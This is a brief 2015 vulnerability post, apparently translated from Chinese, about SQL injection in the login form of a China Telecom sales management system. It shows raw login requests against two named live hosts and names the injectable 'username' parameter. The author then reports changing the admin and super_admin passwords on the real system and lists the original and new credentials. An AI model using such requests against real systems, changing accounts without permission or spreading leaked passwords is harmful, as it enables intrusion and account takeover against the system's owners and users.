
SQL injection vulnerability in the login form of a China Telecom system

2015/6/26 Author: 彩儿 Source: compiled by this site

  Version 3.0 of the China Telecom Sales Manager system (销售管家) has a SQL injection in its login form.

  POST /install/login.php HTTP/1.1
  Content-Length: 209
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  Referer: http://sdgree.grirms.com:80/
  Cookie: PHPSESSID=edq5psps1jo1fvo13cea7uku05; grirms_grirms_remember_me=ogfdiclb
  Host: sdgree.grirms.com
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin

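  Parameter: username

  At login the system reported that the password had expired and had to be changed, so the administrator passwords were changed:

  Original password: admin/sdgree1234567
  Current password: admin/Sdgree123
  Original password: super_admin/sdgree1111111
  Current password: super_admin/Sdgree123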

  Other case: http://bx.grirms.com/

  POST /install/login.php HTTP/1.1
  Content-Length: 209
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  Referer: http://bx.grirms.com:80/install/login.php
  Host: bx.grirms.com
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin
